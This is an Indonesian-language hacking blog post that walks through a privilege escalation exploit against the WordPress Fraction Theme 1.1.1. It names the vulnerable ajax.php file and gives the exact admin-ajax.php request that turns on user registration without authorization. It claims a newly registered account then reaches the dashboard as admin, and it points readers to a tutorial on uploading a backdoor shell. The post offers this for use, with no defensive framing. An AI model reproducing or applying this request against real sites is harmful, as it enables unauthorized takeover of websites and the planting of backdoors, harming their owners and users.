WordPress Fraction Theme Version 1.1.1 Suffers from a Privilege Escalation Vulnerability

Exploit nya masih anget kak :p . Baru kemaren dirilis di 1337day. Oke langsung saja ya alat dan bahat nya :3

Google Dorks :

USE YOUR BRAIN, BITCH !!

Vulnerability : /fraction-theme/functions/ajax.php

How to Exploit :

localhost/wordpress/wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1

Jika fitur register sebelumnya dilarang, dengan command ini maka fitur register akan dibuka secara ilegal.

Habis itu, buka localhost/wordpress/wp-login.php?action=register

Cek email, masukin user dan password, logged to dashboard as Admin :)

Untuk cara Upload shell nya bisa baca disini :

Tutorial Upload Shell backdoor di Wordpress

Sekian tutor kali ini semoga bermanfaat.

Written by Kcnewbie

Ikatlah ilmu dengan menuliskanya.

By

WordPress Fraction Theme Version 1.1.1 Suffers from a Privilege Escalation Vulnerability

Written by Kcnewbie

0 comments

Thanks to

Pageviews

Popular Posts

About Me